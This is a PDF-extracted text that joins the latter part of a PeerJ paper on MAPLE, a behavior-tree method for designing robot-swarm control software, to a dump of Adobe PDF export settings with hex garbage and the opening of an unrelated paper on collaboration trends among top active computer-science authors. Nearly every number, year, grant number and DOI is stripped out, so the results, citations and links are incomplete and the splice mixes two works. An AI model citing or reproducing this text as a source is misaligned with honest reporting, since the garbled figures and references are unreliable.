none of the variants outperformed maple. maple, nd, and ca|cc perform similarly; moreover, they outperform icfn, fl, sp, and the dummy control software. the variants icfn, fl, and the dummy control software show similar performance. see fig. a. all the instances of control software generated by maple show similar behaviors: the robots explore the arena until they find one of the food sources, then navigate towards the nest using the light as guidance.
in some cases, the robots use the anti-phototaxis low-level behavior to directly leave the nest once they have deposited an item. with variant nd, we can manually design control software that displays an elaborate strategy: the robots increase the rate at which they discover food sources by only exploring the gray area of the arena. this behavior cannot be expressed by maple (see study 2). an example of a behavior tree adopting variant nd that displays this strategy is illustrated in the supplemental material (ligot et al., ). in this example, the elaborate strategy only emerges if the success probability of the condition node below the negation decorator is set to 1. indeed, if the success probability is slightly lower, the behavior displayed is radically different and, more importantly, inefficient. it appears that, with the allocated budget, this necessary condition makes it unlikely for iterated f-race to produce this strategy.
figure: results of study 3. performance in simulation of different variants of maple. the dotted line represents the median performance of the dummy control software.
iterated f-race was not able to take advantage of the disjunction of conditions that is available in ca|cc to find better solutions than those of maple. indeed, we are unable to do so ourselves. however, the increased search space of ca|cc does not hinder the optimization process, as the results obtained are similar to those of maple. in variant sp, the success probabilities, together with the conditions, are termination mechanisms for the subtrees. the additional termination mechanisms make it harder for iterated f-race to exploit correlations between conditions and actions that lead to behaviors as efficient as those generated by maple. most of the produced control software relies essentially on the exploration low-level behavior. with variant icfn, one can generate a behavior tree that expresses the same elaborate strategies that can be generated with variant nd (see the supplemental material (ligot et al., ) for an example). however, icfn faces a problem similar to that of nd: the success probability of the conditions needs to be set to 1 in order for that elaborate strategy to emerge. with a success probability set to a lower value, the condition node might return failure even though its condition is met, and the subtree might therefore terminate prematurely. the allocated design budget was not large enough for iterated f-race to find behavior trees with meaningful connections between the conditions and behaviors, which resulted in poor performance. the performance of the variant fl shows the highest variance. sometimes, the behavior trees generated are similar to those produced by maple. however, in many cases, the left leaf node of subtrees is an action node with an associated exploration low-level behavior. once this node is reached, this low-level behavior is executed until the end of the experimental run. as a result, the performance observed is similar to that of the dummy control software.
aggregation
variant icfn outperforms maple. maple, fl, nd, and sp show similar performance. maple outperforms ca|cc.
every variant produced behavior trees that outperform the dummy control software. see fig. b. all the instances of control software generated by maple and the different variants make use of exploration and attraction as low-level behaviors to efficiently search for the black spots. maple and fl use stop as a low-level behavior in order to keep the robots on the discovered spot. contrarily, the majority of the behavior trees adopting variants icfn, nd, sp, and ca|cc do not contain the stop low-level behavior as an action node. instead, they take advantage of the fact that, when no action node is executed, the robot stands still. icfn is the only variant for which iterated f-race was able to exploit this feature to outperform maple.

related work
originating from game development (isla, ), behavior trees have found recent applications in artificial intelligence (perez et al., ) and robotics. most of the robotics research focuses on their use in manipulators. bagnell et al. ( ) used behavior trees to control a manipulator to perform simple manipulation tasks. hu et al. ( ) used them to control the raven-ii surgical robot to perform an abstract version of tumor ablation surgery. behavior trees have also been used as control software for mobile robotic systems. marzinotto et al. ( ) designed a behavior tree to make a nao robot move towards a table and grasp an object. in all of the presented studies, behavior trees have been manually designed. to the best of our knowledge, the work of jones et al. ( ) is the first and only application of behavior trees in the context of the automatic off-line design of robot swarms (the authors later adapted their system for the onboard evolution of a swarm of nine xpucks (jones et al., ); neupane & goodrich ( ) proposed a method based on the grammatical evolution of behavior trees for robot swarms, but their experiments were conducted in simulation only and the focus of their paper is mainly on the evolutionary approach rather than on behavior trees). jones et al. ( ) proposed a method based on genetic programming that automatically generates control software for a swarm of kilobots in the form of behavior trees. the method has been tested on a foraging task, in simulation and in reality. their results suggest that behavior trees can be used as a control architecture in swarm robotics. besides the different optimization processes adopted in the method of jones et al. ( ) and in maple, another major difference between the two methods lies in the action nodes used. in the method proposed by jones et al. ( ), low-level behaviors are atomic commands: for example, move forward, turn left/right, or store data. contrarily, the low-level behaviors that can be combined by maple are more complex actions. regardless of this difference, the low-level behaviors of the two methods lack natural success or failure termination criteria. to use their atomic low-level behaviors as action nodes in behavior trees, jones et al. ( ) programmed the action nodes such that they return success after the second execution of the behavior, but failure is never returned. this solution allowed their method to have no restrictions on the selection of the control-flow nodes. in maple, the action nodes can only return running, but the structure of the behavior trees, and the control-flow nodes, are restricted such that an external condition terminates the execution of an action.

conclusions
in this article, we presented maple: an automatic modular design method that generates control software for robot swarms in the form of behavior trees.
maple is part of the automode family: it generates control software by selecting, combining, and fine-tuning a set of predefined modules. previous instances of automode have all used probabilistic finite-state machines as a control architecture. in comparison to finite-state machines, behavior trees offer a number of appealing features. however, most of these features only emerge if the action nodes return their state of execution, that is, if the robot is able to tell whether the low-level behavior it executes has terminated successfully, could not execute normally, or still requires time to terminate. in the context of swarm robotics, the simple and reactive robots typically used are not able to determine the state of execution of the low-level behaviors they operate. with maple, we have investigated the use of behavior trees as a control architecture in the automatic modular design of control software for robot swarms, and have shown that they can still be used even if the low-level behaviors they combine return neither success nor failure. it is our contention that, even though their potential is not fully exploited in the context of the automatic modular design of robot swarms, behavior trees are a control architecture that is worth exploring. in particular, we reckon that the inherent modularity they offer could be exploited by future automatic modular design methods. in fact, behavior trees can be easily manipulated without compromising their structural integrity, which allows for the use of tailored optimization algorithms based on local manipulations. we devised maple to be as similar as possible to chocolate: the two methods share the same optimization algorithm and the same set of predefined modules, and they generate control software on the basis of the same reference model. the only difference between maple and chocolate is the control architecture adopted. we conducted three studies, based on two missions, foraging and aggregation, to assess the implications of adopting behavior trees as a control architecture. in the first study, we assessed maple's ability to cross the reality gap satisfactorily by comparing its performance in simulation and in reality against chocolate and evostick, an evolutionary swarm robotics method. in the second study, we investigated the effect of the design budget on maple and chocolate. in the third study, we explored different variants of maple's control architecture. our main findings are the following. (a) the results show that maple is robust to the reality gap. indeed, maple and chocolate performed similarly, and they suffered from a reduced performance drop with respect to evostick. these results confirm francesca et al.'s ( ) conjecture that automode is robust to the reality gap due to its modular nature. they also indicate that the architecture into which the predefined modules are combined is a secondary issue.
(b) the study on the effect of the design budget has shown that: (i) the restrictions on the structure of maple's behavior trees inhibit its expressiveness: indeed, for foraging, maple is unable to express some efficient solutions that chocolate can generate; and (ii) maple converges to efficient solutions faster than chocolate because of its smaller search space. the restrictions of maple, imposed by the absence of natural termination criteria in the low-level behaviors adopted, appear to be a double-edged sword: they facilitate the initial search for efficient solutions, but curb the expressiveness of behavior trees. when adopting the low-level behaviors of chocolate, none of the variants considered outperformed maple in both missions. overall, our three studies indicate that behavior trees can be used in the particular context of swarm robotics, in which low-level behaviors typically do not have a natural termination criterion. however, they also suggest that behavior trees only offer a benefit over probabilistic finite-state machines when the design budget is small. future work could develop along two avenues. the first one could be dedicated to further investigating the use of vanilla's and chocolate's low-level behaviors as action nodes of behavior trees. for example, the control software generated by maple with different design budgets could be assessed in robot experiments. the same holds for the control software generated by maple's variants. also, further variants could be explored by relaxing the restrictions on the number of levels, branches, and leaves. for the relevant ones, the effect of the design budget could be investigated. as a second avenue, future work could be devoted to developing an ad-hoc optimization algorithm that takes advantage of the inherent modularity of behavior trees. local search algorithms, such as iterative improvement and simulated annealing, have been shown to be promising algorithms for the automatic modular design of swarm behaviors (kuckling, ubeda arriaza & birattari, ; kuckling, stützle & birattari, ) and could serve as starting points.

additional information and declarations
funding
the project has received funding from the european research council (erc) under the european union's horizon research and innovation program (grant agreement no. ). mauro birattari and jonas kuckling received support from the belgian fonds de la recherche scientifique—fnrs. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript.
grant disclosures
the following grant information was disclosed by the authors: the project has received funding from the european research council (erc) under the european union's horizon research and innovation program (grant agreement no. ). mauro birattari and jonas kuckling received support from the belgian fonds de la recherche scientifique—fnrs. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript.
competing interests
mauro birattari is an academic editor for peerj.
author contributions
• antoine ligot conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft.
• jonas kuckling conceived and designed the experiments, performed the experiments, authored or reviewed drafts of the paper, and approved the final draft.
• darko bozhinoski conceived and designed the experiments, authored or reviewed drafts of the paper, and approved the final draft.
• mauro birattari conceived and designed the experiments, authored or reviewed drafts of the paper, directed the research, and approved the final draft.
data availability
the following information was supplied regarding data availability: data and code are available in the supplemental files and at iridia: http://iridia.ulb.ac.be/supp/iridiasupp - /index.html.
supplemental information
supplemental information for this article can be found online at http://dx.doi.org/ . /peerj-cs. #supplemental-information.
references
bagnell ja, cavalcanti f, cui l, galluzzo t, hebert m, kazemi m, klingensmith m, libby j, liu ty, pollard n, pivtoraiko m, valois j-s, zhu r. . an integrated system for autonomous robotics manipulation. in: ieee/rsj international conference on intelligent robots and systems, iros, piscataway: ieee, – . balaprakash p, birattari m, stützle t. . improvement strategies for the f-race algorithm: sampling design and iterative refinement. in: bartz-beielstein t, blesa mj, blum c, naujoks b, roli a, rudolph g, sampels m, eds. hybrid metaheuristics, th international workshop, hm . vol. . berlin: springer, – . beni g. . from swarm intelligence to swarm robotics. in: Şahin e, spears wm, eds. swarm robotics, sab. vol. . berlin: springer, – . birattari m, ligot a, bozhinoski d, brambilla m, francesca g, garattoni l, garzón ramos d, hasselmann k, kegeleirs m, kuckling j, pagnozzi f, roli a, salman m, stützle t. . automatic off-line design of robot swarms: a manifesto. frontiers in robotics and ai : doi . /frobt. . . birattari m, ligot a, hasselmann k. . disentangling automatic and semi-automatic approaches to the optimization-based design of control software for robot swarms. nature machine intelligence ( ): – doi . /s - - - . bozhinoski d, birattari m. . designing control software for robot swarms: software engineering for the development of automatic design methods. in: proceedings of the st international workshop on robotics software engineering, rose, new york: acm, – . brambilla m, ferrante e, birattari m, dorigo m. . swarm robotics: a review from the swarm engineering perspective. swarm intelligence ( ): – doi . /s - - - . brooks ra. . a robust layered control system for a mobile robot. ieee journal on robotics and automation ( ): – doi . /jra. . . brooks ra. . intelligence without representation. artificial intelligence ( – ): – doi . / - ( ) -m. brooks ra. . artificial life and real robots. in: varela fj, bourgine p, eds. towards a practice of autonomous systems. proceedings of the first european conference on artificial life. cambridge: mit press, – . bäck t, fogel db, michalewicz z. . handbook of evolutionary computation. first. bristol: iop publishing ltd. champandard aj. . understanding behavior trees. available at http://aigamedev.com/open/articles/bt-overview/. champandard aj, dawe m, hernandez-cerpa d. .
behavior trees: three ways of cultivating game ai. game developers conference, ai summit. available at https://www.gdcvault.com/play/ /behavior-trees-three-ways-of. christensen al, dorigo m. . evolving an integrated phototaxis and hole-avoidance behavior for a swarm-bot. in: rocha lm, yaeger ls, bedau ma, floreano d, goldstone rl, vespignani a, eds. artificial life x: proceedings of the tenth international conference on the simulation and synthesis of living systems. cambridge: mit press. a bradford book, – . colledanchise m, Ögren p. . behavior trees in robotics and ai: an introduction. first edition. boca raton: crc press. conover wj. . practical nonparametric statistics. third edition. new york: john wiley & sons. dorigo m, birattari m, brambilla m. . swarm robotics. scholarpedia ( ): doi . /scholarpedia. . floreano d, husbands p, nolfi s. . evolutionary robotics. first. berlin, heidelberg: springer handbook of robotics, springer handbooks, – . francesca g, birattari m. . automatic design of robot swarms: achievements and challenges. frontiers in robotics and ai ( ): – doi . /frobt. . . francesca g, brambilla m, brutschy a, garattoni l, miletitch r, podevijn g, reina a, soleymani t, salvaro m, pinciroli c, mascia f, trianni v, birattari m. . automode-chocolate: automatic design of control software for robot swarms. swarm intelligence ( – ): – doi . /s - - - . francesca g, brambilla m, brutschy a, trianni v, birattari m. . automode: a novel approach to the automatic design of control software for robot swarms. swarm intelligence ( ): – doi . /s - - - . friedman m. . the use of ranks to avoid the assumption of normality implicit in the analysis of variance. journal of the american statistical association ( ): – doi . / . . . friedman m. . a correction: the use of ranks to avoid the assumption of normality implicit in the analysis of variance. journal of the american statistical association ( ): . garattoni l, birattari m. . swarm robotics. in: webster jg, ed. wiley encyclopedia of electrical and electronics engineering. hoboken: john wiley & sons, – . garattoni l, francesca g, brutschy a, pinciroli c, birattari m. . software infrastructure for e-puck (and tam). technical report tr/iridia/ - , iridia, université libre de bruxelles, belgium. available at http://iridia.ulb.ac.be/iridiatrseries/link/iridiatr - .pdf. garzón ramos d, birattari m. . automatic design of collective behaviors for robots that can display and perceive colors. applied sciences ( ): doi . /app . geman s, bienenstock e, doursat r. . neural networks and the bias/variance dilemma. neural computation ( ): – doi . /neco. . . . . gutiérrez Á, campo a, dorigo m, donate j, monasterio-huelin f, magdalena l. . open e-puck range & bearing miniaturized board for local communication in swarm robotics. in: kosuge k, ed. ieee international conference on robotics and automation, icra. piscataway: ieee, – . hasselmann k, ligot a, francesca g, birattari m. . reference models for automode.
technical report tr/iridia/ - , iridia, université libre de bruxelles, belgium. available at http://iridia.ulb.ac.be/iridiatrseries/link/iridiatr - .pdf. hasselmann k, robert f, birattari m. . automatic design of communication-based behaviors for robot swarms. in: dorigo m, birattari m, garnier s, hamann h, montes de oca m, solnon c, stützle t, eds. swarm intelligence—ants. vol. . cham: springer, – . hauert s, zufferey j-c, floreano d. . evolved swarming without positioning information: an application in aerial communication relay. autonomous robots ( ): – doi . /s - - - . hu d, gong y, hannaford b, seibel ej. . semi-autonomous simulated brain tumor ablation with ravenii surgical robot using behavior tree. in: ieee international conference on robotics and automation, icra, piscataway: ieee, – . isla d. . handling complexity in the halo ai. in: game developers conference, vol. . jakobi n, husbands p, harvey i. . noise and the reality gap: the use of simulation in evolutionary robotics. in: morán f, moreno a, merelo jj, chacón p, eds. advances in artificial life: third european conference on artificial life. vol. . berlin: springer, – . jones s, studley m, hauert s, winfield a. . evolving behaviour trees for swarm robotics. in: groß r, kolling a, berman s, frazzoli e, martinoli a, matsuno f, gauci m, eds. distributed autonomous robotic systems (dars). vol. . cham: springer, – . jones s, winfield a, hauert s, studley m. . onboard evolution of understandable swarm behaviors. advanced intelligent systems ( ): doi . /aisy. . kuckling j, ligot a, bozhinoski d, birattari m. a. behavior trees as a control architecture in the automatic modular design of robot swarms. in: dorigo m, birattari m, blum c, christensen al, reina a, trianni v, eds. swarm intelligence—ants. vol. . cham: springer, – . kuckling j, ligot a, bozhinoski d, birattari m. b. search space for automode-chocolate and automode-maple. technical report tr/iridia/ - , iridia, université libre de bruxelles, brussels, belgium. available at http://iridia.ulb.ac.be/iridiatrseries/link/iridiatr - .pdf. kuckling j, stützle t, birattari m. . iterative improvement in the automatic modular design of robot swarms. peerj computer science (in press). kuckling j, ubeda arriaza k, birattari m. . simulated annealing as an optimization algorithm in the automatic modular design of robot swarms. in: beuls k, bogaerts b, bontempi g, geurts p, harley n, lebichot b, lenaerts t, gilles l, van eecke p, eds. proceedings of the reference ai & ml conference for belgium, netherlands & luxemburg, bnaic/benelearn . vol. . aachen: ceur workshop proceedings. ligot a, birattari m. . on mimicking the effects of the reality gap with simulation-only experiments. in: dorigo m, birattari m, garnier s, hamann h, montes de oca m, solnon c, stützle t, eds. swarm intelligence—ants. vol. . cham: springer, – . ligot a, birattari m. . simulation-only experiments to mimic the effects of the reality gap in the automatic design of robot swarms. swarm intelligence ( ): – doi . /s - - -w. ligot a, kuckling j, bozhinoski d, birattari m. .
automatic modular design of robot swarms using behavior trees as a control architecture. available at http://iridia.ulb.ac.be/supp/ iridiasupp - /index.html. lim c-u, baumgarten r, colton s. . evolving behaviour trees for the commercial game defcon. in: di chio c, cagnoni s, cotta c, ebner m, ekárt a, esparcia-alcázar ai, goh c-k, merelo jj, neri f, preuss m, togelius j, yannakakis gn, eds. applications of evolutionary computation. vol. . berlin: springer, – . lipson h. . evolutionary robotics and open-ended design automation. in: bar-cohen y, ed. biomimetics: biologically inspired technologies. vol. . boca raton: crc press, – . lópez-ibáñez m, dubois-lacoste j, pérez cáceres l, birattari m, stützle t. . the irace package: iterated racing for automatic algorithm configuration. operations research perspectives : – doi . /j.orp. . . . marzinotto a, colledanchise m, smith c, Ögren p. . towards a unified behavior trees framework for robot control. in: ieee international conference on robotics and automation, icra, piscataway: ieee, – . mondada f, bonani m, raemy x, pugh j, cianci c, klaptocz a, magnenat s, zufferey j-c, floreano d, martinoli a. . the e-puck, a robot designed for education in engineering. in: gonçalves p, torres p, alves c, eds. proceedings of the th conference on autonomous robot systems and competitions. castelo branco: instituto politécnico de castelo branco, – . nehaniv cl, dautenhahn k. . imitation in animals and artifacts. first edition. cambridge: mit press. ligot et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /aisy. http://iridia.ulb.ac.be/iridiatrseries/link/iridiatr - .pdf http://iridia.ulb.ac.be/iridiatrseries/link/iridiatr - .pdf http://dx.doi.org/ . /s - - -w http://iridia.ulb.ac.be/supp/iridiasupp - /index.html http://iridia.ulb.ac.be/supp/iridiasupp - /index.html http://dx.doi.org/ . /j.orp. . . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ neupane a, goodrich m. . learning swarm behaviors using grammatical evolution and behavior trees. in: kraus s, ed. twenty-eighth international joint conference on artificial intelligence (ijcai- ). ijcai, – . Ögren p. . increasing modularity of uav control systems using computer game behavior trees. in: thienel j, ed. aiaa guidance, navigation, and control conference . reston: aiaa meeting papers, – . paxton c, hundt a, jonathan f, guerin k, hager gd. . costar: instructing collaborative robots with behavior trees and vision. in: ieee international conference on robotics and automation, icra, piscataway: ieee, – . perez d, nicolau m, o’neill m, brabazon a. . evolving behaviour trees for the mario ai competition using grammatical evolution. in: di chio c, cagnoni s, cotta c, ebner m, ekárt a, esparcia-alcázar ai, merelo jj, neri f, preuss m, richter h, togelius j, yannakakis gn, eds. applications of evolutionary computation, volume of lecture notes in computer science. berlin: springer, – . pinciroli c, trianni v, o’grady r, pini g, brutschy a, brambilla m, mathews n, ferrante e, di caro ga, ducatelle f, birattari m, gambardella lm, dorigo m. . argos: a modular, parallel, multi-engine simulator for multi-robot systems. swarm intelligence ( ): – doi . /s - - - . quinn m, smith l, mayley g, husbands p. . evolving controllers for a homogeneous system of physical robots: structured cooperation with minimal sensors. philosophical transactions of the royal society of london. series a: mathematical, physical and engineering sciences ( ): – doi . /rsta. . . Şahin e. . 
swarm robotics: from sources of inspiration to domains of application. in: Şahin e, spears wm, eds. swarm robotics, sab. vol. . berlin: springer, – . salman m, ligot a, birattari m. . concurrent design of control software and configuration of hardware for robot swarms under economic constraints. peerj computer science ( ):e doi . /peerj-cs. . silva f, duarte m, correia l, oliveira sm, christensen al. . open issues in evolutionary robotics. evolutionary computation ( ): – doi . /evco_a_ . spaey g, kegeleirs m, garzón ramos d, birattari m. . comparison of different exploration schemes in the automatic modular design of robot swarms. in: beuls k, bogaerts b, bontempi g, geurts p, harley n, lebichot b, lenaerts t, gilles l, van eecke p, eds. proceedings of the reference ai & ml conference for belgium, netherlands & luxemburg, bnaic/benelearn . vol. . aachen: ceur workshop proceedings. spears wm, spears d, hamann jc, heil r. . distributed, physics-based control of swarms of vehicles. autonomous robots ( ): – doi . /b:auro. . .f . stranieri a, turgut ae, salvaro m, garattoni l, francesca g, reina a, dorigo m, birattari m. . iridia’s arena tracking system. technical report tr/iridia/ - , iridia, université libre de bruxelles, belgium. available at http://iridia.ulb.ac.be/iridiatrseries/link/ iridiatr - .pdf. trianni v. . evolutionary swarm robotics. berlin: springer. trianni v. . evolutionary robotics: model or design? frontiers in robotics and ai : doi . /frobt. . . trianni v, nolfi s. . self-organizing sync in a robotic swarm: a dynamical system view. ieee transactions on evolutionary computation ( ): – doi . /tevc. . . ligot et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /rsta. . http://dx.doi.org/ . /peerj-cs. http://dx.doi.org/ . /evco_a_ http://dx.doi.org/ . /b:auro. . .f http://iridia.ulb.ac.be/iridiatrseries/link/iridiatr - .pdf http://iridia.ulb.ac.be/iridiatrseries/link/iridiatr - .pdf http://dx.doi.org/ . /frobt. . http://dx.doi.org/ . /tevc. . https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. automatic modular design of robot swarms using behavior trees as a control architecture introduction automode&#x ;maple experimental setup study : performance in simulation and reality study : performance versus design budget study : maple and some of its possible variants results related work conclusions references << /ascii encodepages false /allowtransparency false /autopositionepsfiles true /autorotatepages /none /binding /left /calgrayprofile (dot gain %) /calrgbprofile (srgb iec - . ) /calcmykprofile (u.s. web coated \ swop\ v ) /srgbprofile (srgb iec - . ) /cannotembedfontpolicy /warning /compatibilitylevel . /compressobjects /off /compresspages true /convertimagestoindexed true /passthroughjpegimages true /createjobticket false /defaultrenderingintent /default /detectblends true /detectcurves . 
/colorconversionstrategy /leavecolorunchanged /dothumbnails false /embedallfonts true /embedopentype false /parseiccprofilesincomments true /embedjoboptions true /dscreportinglevel /emitdscwarnings false /endpage - /imagememory /lockdistillerparams false /maxsubsetpct /optimize true /opm /parsedsccomments true /parsedsccommentsfordocinfo true /preservecopypage true /preservedicmykvalues true /preserveepsinfo true /preserveflatness true /preservehalftoneinfo false /preserveopicomments false /preserveoverprintsettings true /startpage /subsetfonts true /transferfunctioninfo /apply /ucrandbginfo /preserve /useprologue false /colorsettingsfile (none) /alwaysembed [ true ] /neverembed [ true ] /antialiascolorimages false /cropcolorimages true /colorimageminresolution /colorimageminresolutionpolicy /ok /downsamplecolorimages false /colorimagedownsampletype /average /colorimageresolution /colorimagedepth /colorimagemindownsampledepth /colorimagedownsamplethreshold . /encodecolorimages true /colorimagefilter /flateencode /autofiltercolorimages false /colorimageautofilterstrategy /jpeg /coloracsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /colorimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg coloracsimagedict << /tilewidth /tileheight /quality >> /jpeg colorimagedict << /tilewidth /tileheight /quality >> /antialiasgrayimages false /cropgrayimages true /grayimageminresolution /grayimageminresolutionpolicy /ok /downsamplegrayimages false /grayimagedownsampletype /average /grayimageresolution /grayimagedepth /grayimagemindownsampledepth /grayimagedownsamplethreshold . /encodegrayimages true /grayimagefilter /flateencode /autofiltergrayimages false /grayimageautofilterstrategy /jpeg /grayacsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /grayimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg grayacsimagedict << /tilewidth /tileheight /quality >> /jpeg grayimagedict << /tilewidth /tileheight /quality >> /antialiasmonoimages false /cropmonoimages true /monoimageminresolution /monoimageminresolutionpolicy /ok /downsamplemonoimages false /monoimagedownsampletype /average /monoimageresolution /monoimagedepth - /monoimagedownsamplethreshold . /encodemonoimages true /monoimagefilter /ccittfaxencode /monoimagedict << /k - >> /allowpsxobjects false /checkcompliance [ /none ] /pdfx acheck false /pdfx check false /pdfxcompliantpdfonly false /pdfxnotrimboxerror true /pdfxtrimboxtomediaboxoffset [ . . . . ] /pdfxsetbleedboxtomediabox true /pdfxbleedboxtotrimboxoffset [ . . . . 
] /pdfxoutputintentprofile (none) /pdfxoutputconditionidentifier () /pdfxoutputcondition () /pdfxregistryname () /pdfxtrapped /false /createjdffile false /description << /chs <feff f f fd e b bbe b a b efa ef a fc c a c f f fdb c ad d cf a ef ee f f f c f e ee ca f ad c f b efa > /cht <feff f f e b a d f e efa acb f ef ef c a f c f f e a f ad c cea c a ef ee f f f c f e ee ca f ad c f b f df efa acb ef > /dan <feff e c c e e c f f d f b d e c b c b e e c c b f b c e e e e f d f b d e b e e e f c c f e f e e> /deu <feff e e e c c e e a d c c e f e f d f b d e e c f e e e f b b f d b e e f f d e e a e d f e e c c d f b d e b f e e e d f e f e f f f e e e> /esp <feff c f e f e f d e f f f e d f e c e d f f f d e f f e e e f d e f f f e f c f e f e f f e> /fra <feff c a f f e e e f d e f f e d f e c e d d e e c f d e e e e ea f e f c e f e f e c e e> /ita <feff c a a d f a f e f d e f e d c e d e f f b f e f d e f f e f f e f f e f e e> /jpn <feff ad c cea fa b f f e f c b f f e e b cea b fdd c d e c b af c c d d ea f bf e e f f d eb fc d b e e a d b a f c c f d a a eb f f a f e ee d b f c d e > /kor <feffc c c c c acc a d c ec b c a d cd d d b b d bc f ad c ae c d c c ace d c c b c c c c d f bb c cb c c c d b c b e e c b ac c c c b c bb c cb f bc f f e c c c c d c c c f c c c b b c b e e> /nld (gebruik deze instellingen om adobe pdf-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. de gemaakte pdf-documenten kunnen worden geopend met acrobat en adobe reader . en hoger.) /nor <feff b e e c c e e c e f f d f b d e f b f b c e f b c c f f e d f b d e e b e e e f c c f e c c e e> /ptb <feff c a f e e f f d f d e f f d f c d d f b f f f f e f f d e f f f d f f d f f f f e f f f e> /suo <feff b e e e e e b c b e c f f d f b d e a c b f f e c f a f e e c f d f b d e f e f c c a f e a c c a d d c c e> /sve <feff e e e e e e c c e e e f d c c b f d f b d e f b c b e e c b f f b f b e b d f b d e b e f e f f f e f e e> /enu (use these settings to create adobe pdf documents for quality printing on desktop printers and proofers. created pdf documents can be opened with acrobat and adobe reader . and later.) >> /namespace [ (adobe) (common) ( . ) ] /othernamespaces [ << /asreaderspreads false /cropimagestoframes true /errorcontrol /warnandcontinue /flattenerignorespreadoverrides false /includeguidesgrids false /includenonprinting false /includeslug false /namespace [ (adobe) (indesign) ( . ) ] /omitplacedbitmaps false /omitplacedeps false /omitplacedpdf false /simulateoverprint /legacy >> << /addbleedmarks false /addcolorbars false /addcropmarks false /addpageinfo false /addregmarks false /convertcolors /noconversion /destinationprofilename () /destinationprofileselector /na /downsample bitimages true /flattenerpreset << /presetselector /mediumresolution >> /formelements false /generatestructure true /includebookmarks false /includehyperlinks false /includeinteractive false /includelayers false /includeprofiles true /multimediahandling /useobjectsettings /namespace [ (adobe) (creativesuite) ( . ) ] /pdfxoutputintentprofileselector /na /preserveediting true /untaggedcmykhandling /leaveuntagged /untaggedrgbhandling /leaveuntagged /usedocumentbleed false >> ] >> setdistillerparams << /hwresolution [ ] /pagesize [ . . 
] >> setpagedevice research collaboration and topic trends in computer science based on top active authors submitted august accepted december published january corresponding author dah ming chiu, dmchiu@ie.cuhk.edu.hk academic editor luciano sánchez additional information and declarations can be found on page doi . /peerj-cs. copyright wu et al. distributed under creative commons cc-by . open access research collaboration and topic trends in computer science based on top active authors yan wu , srinivasan venkatramanan and dah ming chiu department of information engineering, the chinese university of hong kong, hong kong virginia bioinformatics institute, virginia polytechnic institute and state university (virginia tech), united states abstract academic publication metadata can be used to analyze the collaboration, productivity and hot topic trends of a research community. in this paper, we study a specific group of authors, namely the top active authors. they are defined as the top % authors with uninterrupted and continuous presence in scientific publications over a time window. we take the top active authors in the computer science (cs) community over different time windows in the past years, and use them to analyze collaboration, productivity and topic trends. we show that (a) the top active authors are representative of the overall population; (b) the community is increasingly moving in the direction of team research, with increased level and degree of collaboration; and (c) the research topics are increasingly inter-related. by focusing on the top active authors, it helps visualize these trends better. besides, the observations from top active authors also shed light on design of better evaluation framework and resource management for policy makers in academia. subjects data mining and machine learning, data science, digital libraries, network science and online social networks, social computing keywords top active author, research collaboration, topic trends introduction as a research field established in the s (brookshear, ), computer science has gone through rapid development and become a mature field. much can be learned about the de- velopments and trends in computer science by analyzing the publication metadata. in this study, we take a particular approach, by focusing on analyzing the top active authors in the field. we define top active authors to be the % authors with uninterrupted and contin- uous presence in scientific publications over a time window. the definition of top active authors is based on the term “ucp author”, which was defined by ioannidis, boyack & kla- vans ( ) in their study of publication metadata obtained from scopus in a specific time window of years. during the period from to , they noted that the number of authors who published papers every year without gap amounts to about % of all authors; and these ucp authors coauthored a much larger percentage of papers and amassed a high percentage of the total citations, compared to the average researcher. therefore, we might treat top active authors as the core of the community for the given time window. by analyz- ing their activities, we may get insights into the major trends of the whole community. how to cite this article wu et al. ( ), research collaboration and topic trends in computer science based on top active authors. peerj comput. sci. :e ; doi . /peerj-cs. mailto:dmchiu@ie.cuhk.edu.hk https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . 
/peerj-cs. http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. in our study, we further explore the nature and extent of collaborative efforts by the top active authors in comparison with average authors. recently, it was pointed out by wuchty, jones & uzzi ( ) that “team science” is an important trend in how research is carried out. the phenomenon is manifested in the steady increase in the number of coauthors per paper. since this trend exists not only in science but also in other research fields, we can refer to it as “team research”. the “team” in team research may correspond to an organized group within an organization (a research lab), or collaborative partnership between researchers in different organizations and countries. from the collaboration patterns of top active authors, we can get more insights about team research, in particular its relation to research productivity. besides, by observing the research topics that top active authors are working on, we can also get a sense of the general research topic trends in the whole community. our goal goes beyond simple data analysis in this work. we hope the observations from top active authors can not only show the general trends in doing research in the academic community, but also provide insights for policy researchers and policy makers in academia. for example, the comparison between top active authors and average authors might shed light on the shortcomings of current author evaluation framework, and help develop different evaluation metrics for different author types. and the general trends in research collaboration and topic may also help policy makers adjust resource allocations at different periods and do better resource management. related work research collaboration has been long studied in the scientometrics field. for example, katz ( ) examined the geographical effects on intra-national scientific collaboration and demonstrated that research collaboration decreases exponentially with the distance sepa- rating the collaborative partners. wagner & leydesdorff ( ) showed that international collaboration is a self-organizing network, and its growth can be explained based on the organizing principle of preferential attachment. there are also a lot of works focusing on the statistically significant increase in the amount of research collaboration in this field. for example, o’brien ( ) showed the overall increase in the number of coauthored articles in the literature; wuchty, jones & uzzi ( ) coined the term “team science” and showed the increasing dominance of team science in the production of knowledge; and uddin, hossain & rasmussen ( ) studied the network effects on authors’ collaboration behaviors. the authors’ research collaboration behavior also attracted attentions from researchers studying networks, and most of the studies were based on the classic work from newman ( ). he treated the coauthor network as a special example of a social network and studied the structural properties of such a network. researchers have also studied the structural evolution of a collaboration network. for instance, kunegis, fay & bauckhage ( ) analyzed the eigenvector evolution of the coauthor network and proposed a spectral evolution model to show the change of coauthor structures; huang et al. ( ) proposed a stochastic poisson model with optimization tree, which can efficiently predict wu et 